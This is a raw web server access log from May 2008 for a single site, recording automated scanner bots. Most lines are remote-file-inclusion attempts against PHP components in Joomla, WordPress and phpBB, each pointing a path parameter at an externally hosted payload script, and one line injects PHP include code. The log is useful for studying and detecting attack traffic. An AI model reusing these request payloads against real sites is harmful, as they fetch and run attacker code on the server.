81.169.141.165 - - [04/May/2008:12:20:17 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.imageforum.ru//language/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:12:20:46 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:12:20:56 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:12:21:00 -0700] "GET /logs/access_080302.log/index.php?pageurl=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:12:21:01 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:12:21:03 -0700] "GET /index.php?pageurl=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:12:21:04 -0700] "GET /logs/index.php?pageurl=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:12:21:20 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.70.125.187 - - [04/May/2008:12:21:22 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.25.167.10 - - [04/May/2008:12:21:23 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.70.125.187 - - [04/May/2008:12:21:28 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.125.187 - - [04/May/2008:12:21:30 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.125.187 - - [04/May/2008:12:23:02 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.125.187 - - [04/May/2008:12:23:05 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.125.187 - - [04/May/2008:12:23:05 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:12:23:56 -0700] "GET /logs/access_080101.log/index.php?pageurl=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.130.2.13 - - [04/May/2008:12:25:11 -0700] "GET /index.php?pageurl=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:12:25:37 -0700] "GET /logs//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 45988 "-" "libwww-perl/5.805" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:12:25:42 -0700] "GET //?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
216.70.125.187 - - [04/May/2008:12:27:17 -0700] "GET /logs/access_080228.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.21.40.235 - - [04/May/2008:12:27:40 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://jogador.fxplus.mail333.su/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.21.40.235 - - [04/May/2008:12:27:41 -0700] "GET //skin/zero_vote/error.php?dir=http://jogador.fxplus.mail333.su/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.21.40.235 - - [04/May/2008:12:27:41 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://jogador.fxplus.mail333.su/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.21.40.235 - - [04/May/2008:12:28:36 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://jogador.fxplus.mail333.su/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.29.70.163 - - [04/May/2008:12:29:11 -0700] "GET /logs/access.log/index.php?name=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [04/May/2008:12:29:15 -0700] "GET /index.php?name=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [04/May/2008:12:29:17 -0700] "GET /logs/index.php?name=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.50.26 - - [04/May/2008:12:29:19 -0700] "GET /logs/access.log/index.php?name=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [04/May/2008:12:29:23 -0700] "GET /index.php?name=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [04/May/2008:12:29:23 -0700] "GET /logs/index.php?name=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.60.186 - - [04/May/2008:12:30:08 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.98.60.186 - - [04/May/2008:12:30:08 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
61.47.60.169 - - [04/May/2008:12:30:28 -0700] "GET /logs//login.php?dir=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.47.60.169 - - [04/May/2008:12:30:38 -0700] "GET //login.php?dir=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.70.125.187 - - [04/May/2008:12:30:40 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.27.0.108 - - [04/May/2008:12:30:55 -0700] "GET /logs/access.log HTTP/1.1" 200 332594 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
83.137.192.95 - - [04/May/2008:12:31:35 -0700] "GET /index.php3?act=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.137.192.95 - - [04/May/2008:12:31:35 -0700] "GET /index.php3?act=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.19.107.122 - - [04/May/2008:12:31:47 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.deadword.we.bs/mic22.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:12:31:52 -0700] "GET /logs/access_080121.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:12:31:52 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:12:31:52 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:12:31:55 -0700] "GET /logs/access_080121.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:12:31:55 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:12:31:55 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.54.28.163 - - [04/May/2008:12:32:12 -0700] "GET /galerie.php?do=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:32:17 -0700] "GET /logs/access_080121.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:32:17 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:32:17 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:32:28 -0700] "GET /logs/access_080121.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:32:28 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:32:28 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:32:40 -0700] "GET /logs/access_080121.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:32:40 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:32:41 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.73.146.54 - - [04/May/2008:12:33:13 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.105.82 - - [04/May/2008:12:33:15 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:12:33:25 -0700] "GET /logs/access_080121.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:12:33:25 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:12:33:25 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:12:33:29 -0700] "GET /logs/access_080121.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:12:33:29 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:12:33:29 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.17.101.27 - - [04/May/2008:12:33:37 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.13.188 - - [04/May/2008:12:33:37 -0700] "GET /logs/access_080121.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.13.188 - - [04/May/2008:12:33:38 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.13.188 - - [04/May/2008:12:33:38 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:12:33:49 -0700] "GET /logs/access_080121.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:12:33:50 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:12:33:50 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.246.154.12 - - [04/May/2008:12:34:01 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
131.128.169.79 - - [04/May/2008:12:34:07 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.103.23.40 - - [04/May/2008:12:34:46 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [04/May/2008:12:34:46 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:12:34:47 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.103.23.40 - - [04/May/2008:12:34:47 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [04/May/2008:12:34:47 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.105.42 - - [04/May/2008:12:34:47 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.90.77.57 - - [04/May/2008:12:35:09 -0700] "GET /logs/access_071223.log/classes/templater/templater.class.php?classes_dir=http://www.gameheros.org/WebAdmin/phpmailer/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.239.170.75 - - [04/May/2008:12:35:19 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.50.26 - - [04/May/2008:12:35:22 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.13.188 - - [04/May/2008:12:35:42 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.33.45 - - [04/May/2008:12:36:01 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [04/May/2008:12:36:05 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://allblackberry.com/install/id.txt???? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [04/May/2008:12:36:05 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:12:37:09 -0700] "GET /logs/access_080218.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.70.163 - - [04/May/2008:12:37:44 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.25yearsofhits.com/admin/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.84.143.199 - - [04/May/2008:12:38:49 -0700] "GET /logs/access_080204.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.143.199 - - [04/May/2008:12:38:49 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.143.199 - - [04/May/2008:12:38:49 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:12:39:15 -0700] "GET /logs/access_080121.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:12:39:16 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [04/May/2008:12:39:16 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:12:39:42 -0700] "GET /logs/access_080121.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.84.143.199 - - [04/May/2008:12:39:43 -0700] "GET /logs/access_080308.log//init_basic.php?GALLERY_BASEDIR=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:12:39:43 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.84.143.199 - - [04/May/2008:12:39:43 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.143.199 - - [04/May/2008:12:39:43 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.19.144.26 - - [04/May/2008:12:39:43 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.84.143.199 - - [04/May/2008:12:40:08 -0700] "GET /logs/access_071222.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:12:40:32 -0700] "GET /logs/access_080209.log///squirrelcart/cart_content.php?cart_isp_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:12:40:33 -0700] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/May/2008:12:40:34 -0700] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:12:40:43 -0700] "GET /logs/access_080121.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:12:40:43 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [04/May/2008:12:40:43 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
